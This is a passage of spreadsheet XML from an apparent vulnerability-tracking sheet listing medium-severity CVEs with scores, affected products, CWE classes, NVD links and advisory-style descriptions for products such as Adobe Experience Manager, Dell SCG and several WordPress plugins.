      <c r="K4970" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L497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970" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75731</t>
        </is>
      </c>
    </row>
    <row r="4971">
      <c r="A4971" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4971" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75733</t>
        </is>
      </c>
      <c r="C4971" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="D4971" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4971" s="5" t="inlineStr"/>
      <c r="F4971" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G4971" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H4971" s="5" t="inlineStr">
        <is>
          <t>adobe:experience_manager</t>
        </is>
      </c>
      <c r="I4971" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J4971" s="5" t="inlineStr"/>
      <c r="K4971" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L497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971" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75733</t>
        </is>
      </c>
    </row>
    <row r="4972">
      <c r="A4972" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4972" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75734</t>
        </is>
      </c>
      <c r="C4972" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="D4972" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4972" s="5" t="inlineStr"/>
      <c r="F4972" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G4972" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H4972" s="5" t="inlineStr">
        <is>
          <t>adobe:experience_manager</t>
        </is>
      </c>
      <c r="I4972" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J4972" s="5" t="inlineStr"/>
      <c r="K4972" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L497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972" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75734</t>
        </is>
      </c>
    </row>
    <row r="4973">
      <c r="A4973" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4973" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75735</t>
        </is>
      </c>
      <c r="C4973" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="D4973" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4973" s="5" t="inlineStr"/>
      <c r="F4973" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G4973" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H4973" s="5" t="inlineStr">
        <is>
          <t>adobe:experience_manager</t>
        </is>
      </c>
      <c r="I4973" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J4973" s="5" t="inlineStr"/>
      <c r="K4973" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L497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973" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75735</t>
        </is>
      </c>
    </row>
    <row r="4974">
      <c r="A4974" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4974" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75736</t>
        </is>
      </c>
      <c r="C4974" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="D4974" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4974" s="5" t="inlineStr"/>
      <c r="F4974" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G4974" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H4974" s="5" t="inlineStr">
        <is>
          <t>adobe:experience_manager</t>
        </is>
      </c>
      <c r="I4974" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J4974" s="5" t="inlineStr"/>
      <c r="K4974" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L497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974" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75736</t>
        </is>
      </c>
    </row>
    <row r="4975">
      <c r="A4975" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4975" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75737</t>
        </is>
      </c>
      <c r="C4975" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="D4975" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4975" s="5" t="inlineStr"/>
      <c r="F4975" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G4975" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H4975" s="5" t="inlineStr">
        <is>
          <t>adobe:experience_manager</t>
        </is>
      </c>
      <c r="I4975" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J4975" s="5" t="inlineStr"/>
      <c r="K4975" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L497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975" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75737</t>
        </is>
      </c>
    </row>
    <row r="4976">
      <c r="A4976" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4976" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75738</t>
        </is>
      </c>
      <c r="C4976" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="D4976" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4976" s="5" t="inlineStr"/>
      <c r="F4976" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G4976" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H4976" s="5" t="inlineStr">
        <is>
          <t>adobe:experience_manager</t>
        </is>
      </c>
      <c r="I4976" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J4976" s="5" t="inlineStr"/>
      <c r="K4976" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L497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976" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75738</t>
        </is>
      </c>
    </row>
    <row r="4977">
      <c r="A4977" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4977" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75739</t>
        </is>
      </c>
      <c r="C4977" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="D4977" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4977" s="5" t="inlineStr"/>
      <c r="F4977" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G4977" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H4977" s="5" t="inlineStr">
        <is>
          <t>adobe:experience_manager</t>
        </is>
      </c>
      <c r="I4977" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J4977" s="5" t="inlineStr"/>
      <c r="K4977" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L497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977" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75739</t>
        </is>
      </c>
    </row>
    <row r="4978">
      <c r="A4978" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4978" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75740</t>
        </is>
      </c>
      <c r="C4978" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="D4978" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4978" s="5" t="inlineStr"/>
      <c r="F4978" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G4978" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H4978" s="5" t="inlineStr">
        <is>
          <t>adobe:experience_manager</t>
        </is>
      </c>
      <c r="I4978" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J4978" s="5" t="inlineStr"/>
      <c r="K4978" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L497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978" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75740</t>
        </is>
      </c>
    </row>
    <row r="4979">
      <c r="A4979" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4979" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75741</t>
        </is>
      </c>
      <c r="C4979" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="D4979" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4979" s="5" t="inlineStr"/>
      <c r="F4979" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G4979" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H4979" s="5" t="inlineStr">
        <is>
          <t>adobe:experience_manager</t>
        </is>
      </c>
      <c r="I4979" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J4979" s="5" t="inlineStr"/>
      <c r="K4979" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L497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979" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75741</t>
        </is>
      </c>
    </row>
    <row r="4980">
      <c r="A4980" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4980" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75742</t>
        </is>
      </c>
      <c r="C4980" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="D4980" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4980" s="5" t="inlineStr"/>
      <c r="F4980" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G4980" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H4980" s="5" t="inlineStr">
        <is>
          <t>adobe:experience_manager</t>
        </is>
      </c>
      <c r="I4980" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J4980" s="5" t="inlineStr"/>
      <c r="K4980" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L498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980" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75742</t>
        </is>
      </c>
    </row>
    <row r="4981">
      <c r="A4981" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4981" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79418</t>
        </is>
      </c>
      <c r="C4981" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="D4981" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4981" s="5" t="inlineStr"/>
      <c r="F4981" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G4981" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H4981" s="5" t="inlineStr"/>
      <c r="I4981" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J4981" s="5" t="inlineStr"/>
      <c r="K4981" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L4981" s="5" t="inlineStr">
        <is>
          <t>EMX Tecnologia Gestao X version &lt;= 8.4 contains a Stored Cross-Site Scripting (XSS) vulnerability in the Help Chat functionality. Improper neutralization of user-controlled input during web page generation allows authenticated attackers to execute arbitrary JavaScript in the context of other authenticated users, potentially resulting in session hijacking, account takeover, and unauthorized actions.</t>
        </is>
      </c>
      <c r="M4981" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79418</t>
        </is>
      </c>
    </row>
    <row r="4982">
      <c r="A4982" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4982" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79640</t>
        </is>
      </c>
      <c r="C4982" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="D4982" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4982" s="5" t="inlineStr"/>
      <c r="F4982" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G4982" s="5" t="inlineStr"/>
      <c r="H4982" s="5" t="inlineStr">
        <is>
          <t>dell:secure_connect_gateway</t>
        </is>
      </c>
      <c r="I4982" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J4982" s="5" t="inlineStr"/>
      <c r="K4982" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="L4982" s="5" t="inlineStr">
        <is>
          <t>Dell SCG 5.0 Appliance versions prior to 5.36.00.16 and Dell SCG 5.0 Application versions prior to 5.36.00.00, contains an Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability. A low privileged attacker with remote access could potentially exploit this vulnerability, leading to unauthorized access.</t>
        </is>
      </c>
      <c r="M4982" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79640</t>
        </is>
      </c>
    </row>
    <row r="4983">
      <c r="A4983" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4983" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79905</t>
        </is>
      </c>
      <c r="C4983" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="D4983" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4983" s="5" t="inlineStr"/>
      <c r="F4983" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G4983" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H4983" s="5" t="inlineStr">
        <is>
          <t>adobe:experience_manager</t>
        </is>
      </c>
      <c r="I4983" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J4983" s="5" t="inlineStr"/>
      <c r="K4983" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L498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983" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79905</t>
        </is>
      </c>
    </row>
    <row r="4984">
      <c r="A4984" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4984" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81888</t>
        </is>
      </c>
      <c r="C4984" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="D4984" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4984" s="5" t="inlineStr"/>
      <c r="F4984" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G4984" s="5" t="inlineStr"/>
      <c r="H4984" s="5" t="inlineStr"/>
      <c r="I4984" s="5" t="inlineStr">
        <is>
          <t>2026-08-31</t>
        </is>
      </c>
      <c r="J4984" s="5" t="inlineStr"/>
      <c r="K4984" s="5" t="inlineStr">
        <is>
          <t>CWE-1275, CWE-352</t>
        </is>
      </c>
      <c r="L4984" s="5" t="inlineStr">
        <is>
          <t>@hono/oauth-providers is Authentication middleware for Hono. Prior to version 0.8.6, the built-in social login providers accept an OAuth callback even when the `state` value is absent on both sides, so the anti-CSRF check passes for a callback that never came from a genuine login attempt. This defeats the `state`-based CSRF protection under default usage. Version 0.8.6 has a patch.</t>
        </is>
      </c>
      <c r="M4984" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81888</t>
        </is>
      </c>
    </row>
    <row r="4985">
      <c r="A4985" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4985" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81890</t>
        </is>
      </c>
      <c r="C4985" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="D4985" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4985" s="5" t="inlineStr"/>
      <c r="F4985" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G4985" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H4985" s="5" t="inlineStr"/>
      <c r="I4985" s="5" t="inlineStr">
        <is>
          <t>2026-08-31</t>
        </is>
      </c>
      <c r="J4985" s="5" t="inlineStr"/>
      <c r="K4985" s="5" t="inlineStr">
        <is>
          <t>CWE-352</t>
        </is>
      </c>
      <c r="L4985" s="5" t="inlineStr">
        <is>
          <t>elFinder is an open-source file manager for web, written in JavaScript using jQuery UI. Prior to 2.1.70, the netmount command is omitted from elFinderConnector::$csrfProtectedCmds in php/elFinderConnector.class.php, so validateCsrfToken() is not called for this state-changing operation. In the shipped php/connector.minimal.php-dist configuration, FTP network mounts are enabled by default, and attacker-controlled protocol, host, path, port, user, pass, alias, and options arguments flow through elFinder::netmount() in php/elFinder.class.php to php/elFinderVolumeFTP.class.php. A cross-site request can therefore persist an attacker-chosen FTP mount in the victim's session, cause the PHP server to connect to an attacker-chosen FTP host and port, and send supplied credentials without an X-elFinder-CSRF token. This issue is fixed in version 2.1.70.</t>
        </is>
      </c>
      <c r="M4985" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81890</t>
        </is>
      </c>
    </row>
    <row r="4986">
      <c r="A4986" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4986" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82396</t>
        </is>
      </c>
      <c r="C4986" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="D4986" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4986" s="5" t="inlineStr"/>
      <c r="F4986" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G4986" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H4986" s="5" t="inlineStr"/>
      <c r="I4986" s="5" t="inlineStr">
        <is>
          <t>2026-08-31</t>
        </is>
      </c>
      <c r="J4986" s="5" t="inlineStr"/>
      <c r="K4986" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L4986" s="5" t="inlineStr">
        <is>
          <t>Sulu is an open-source PHP content management system based on the Symfony framework. Prior to versions 2.6.25 and 3.0.8, src/Sulu/Bundle/MediaBundle/Controller/MediaStreamController.php allows the /media/{id}/download/{slug} route and its administration variant to honor the inline query parameter for scriptable MIME types. The vulnerable stored Content-Type values include text/html, application/xhtml+xml, text/xml, and application/xml. An attacker with media upload permission can store an HTML, XHTML, or XML document and create a link using inline=1, causing the application to return the file on the Sulu origin instead of forcing Content-Disposition attachment. When an authenticated victim opens the link, attacker-controlled JavaScript can execute with the victim's Sulu-origin session and can read data or perform actions as that victim. This issue is fixed in versions 2.6.25 and 3.0.8.</t>
        </is>
      </c>
      <c r="M4986" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82396</t>
        </is>
      </c>
    </row>
    <row r="4987">
      <c r="A4987" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4987" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84330</t>
        </is>
      </c>
      <c r="C4987" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="D4987" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4987" s="5" t="inlineStr"/>
      <c r="F4987" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G4987" s="5" t="inlineStr"/>
      <c r="H4987" s="5" t="inlineStr">
        <is>
          <t>google:android, google:chrome</t>
        </is>
      </c>
      <c r="I4987" s="5" t="inlineStr">
        <is>
          <t>2026-09-02</t>
        </is>
      </c>
      <c r="J4987" s="5" t="inlineStr"/>
      <c r="K4987" s="5" t="inlineStr">
        <is>
          <t>CWE-451</t>
        </is>
      </c>
      <c r="L4987" s="5" t="inlineStr">
        <is>
          <t>UI misrepresentation in FullScreen in Google Chrome on on Android prior to 152.0.7977.75 allowed a remote attacker to spoof address bar via a crafted HTML page. (Chromium security severity: Medium)</t>
        </is>
      </c>
      <c r="M4987" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84330</t>
        </is>
      </c>
    </row>
    <row r="4988">
      <c r="A4988" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4988" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84371</t>
        </is>
      </c>
      <c r="C4988" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="D4988" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4988" s="5" t="inlineStr"/>
      <c r="F4988" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G4988" s="5" t="inlineStr">
        <is>
          <t>sap, node.js</t>
        </is>
      </c>
      <c r="H4988" s="5" t="inlineStr"/>
      <c r="I4988" s="5" t="inlineStr">
        <is>
          <t>2026-09-01</t>
        </is>
      </c>
      <c r="J4988" s="5" t="inlineStr"/>
      <c r="K4988" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L4988" s="5" t="inlineStr">
        <is>
          <t>ApostropheCMS is an open-source Node.js content management system, and sanitize-html provides a simple HTML sanitizer with a clear API. From version 1.9.0 until version 2.17.7, packages/sanitize-html/index.js validates an animation value attribute as one flat URL and does not recognize that attributeName selecting href or xlink:href gives the sibling values, from, to, or by attribute SVG SMIL URL semantics. In configurations that allow the animate, animateColor, animateMotion, animateTransform, or set elements, a values list can begin with a safe fragment and contain a later executable destination that survives allowedSchemesAppliedToAttributes checking. When the sanitized SVG is rendered, the browser can copy that later destination into the live link, and a victim who activates the link can execute script in the application's origin. This issue is fixed in version 2.17.7.</t>
        </is>
      </c>
      <c r="M4988" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84371</t>
        </is>
      </c>
    </row>
    <row r="4989">
      <c r="A4989" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4989" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84385</t>
        </is>
      </c>
      <c r="C4989" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="D4989" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4989" s="5" t="inlineStr"/>
      <c r="F4989" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G4989" s="5" t="inlineStr">
        <is>
          <t>fortinet</t>
        </is>
      </c>
      <c r="H4989" s="5" t="inlineStr"/>
      <c r="I4989" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J4989" s="5" t="inlineStr"/>
      <c r="K4989" s="5" t="inlineStr">
        <is>
          <t>CWE-284</t>
        </is>
      </c>
      <c r="L4989" s="5" t="inlineStr">
        <is>
          <t>A improper access control vulnerability in Fortinet FortiSOAR PaaS 7.6.0 through 7.6.6, FortiSOAR PaaS 7.5.0 through 7.5.3, FortiSOAR PaaS 7.4 all versions, FortiSOAR PaaS 7.3 all versions, FortiSOAR on-premise 7.6.0 through 7.6.6, FortiSOAR on-premise 7.5.0 through 7.5.3, FortiSOAR on-premise 7.4 all versions, FortiSOAR on-premise 7.3 all versions may allow attacker to escalation of privilege via &lt;insert attack vector here&gt;</t>
        </is>
      </c>
      <c r="M4989" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84385</t>
        </is>
      </c>
    </row>
    <row r="4990">
      <c r="A4990" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4990" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85133</t>
        </is>
      </c>
      <c r="C4990" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="D4990" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4990" s="5" t="inlineStr"/>
      <c r="F4990" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G4990" s="5" t="inlineStr"/>
      <c r="H4990" s="5" t="inlineStr"/>
      <c r="I4990" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J4990" s="5" t="inlineStr"/>
      <c r="K4990" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L4990" s="5" t="inlineStr">
        <is>
          <t>The WPLP Cookie Consent  WordPress plugin before 4.4.2 does not perform nonce or capability checks on several of its settings AJAX actions, allowing any authenticated user, such as a subscriber, to read and destroy scan data belonging to the administrator and to overwrite the WPLP Cookie Consent  WordPress plugin before 4.4.2's stored configuration.</t>
        </is>
      </c>
      <c r="M4990" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85133</t>
        </is>
      </c>
    </row>
    <row r="4991">
      <c r="A4991" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4991" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85418</t>
        </is>
      </c>
      <c r="C4991" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="D4991" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4991" s="5" t="inlineStr"/>
      <c r="F4991" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G4991" s="5" t="inlineStr"/>
      <c r="H4991" s="5" t="inlineStr"/>
      <c r="I4991" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J4991" s="5" t="inlineStr"/>
      <c r="K4991" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L4991" s="5" t="inlineStr">
        <is>
          <t>The Orbit Fox: Duplicate Page, Menu Icons, SVG Support, Cookie Notice, Custom Fonts &amp; More WordPress plugin before 3.0.9 does not validate a user-supplied HTML tag name in one of its Beaver Builder widgets before echoing it into the rendered markup, allowing users with contributor-level access and above to inject arbitrary web scripts that execute when any visitor views the affected page.</t>
        </is>
      </c>
      <c r="M4991" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85418</t>
        </is>
      </c>
    </row>
    <row r="4992">
      <c r="A4992" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4992" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86483</t>
        </is>
      </c>
      <c r="C4992" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="D4992" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4992" s="5" t="inlineStr"/>
      <c r="F4992" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G4992" s="5" t="inlineStr"/>
      <c r="H4992" s="5" t="inlineStr"/>
      <c r="I4992" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="J4992" s="5" t="inlineStr"/>
      <c r="K4992" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L4992" s="5" t="inlineStr">
        <is>
          <t>In JetBrains YouTrack before 2026.2.18634 stored XSS via a custom field on Agile board cards was possible</t>
        </is>
      </c>
      <c r="M4992" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86483</t>
        </is>
      </c>
    </row>
    <row r="4993">
      <c r="A4993" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4993" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87025</t>
        </is>
      </c>
      <c r="C4993" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="D4993" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4993" s="5" t="inlineStr"/>
      <c r="F4993" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G4993" s="5" t="inlineStr"/>
      <c r="H4993" s="5" t="inlineStr"/>
      <c r="I4993" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
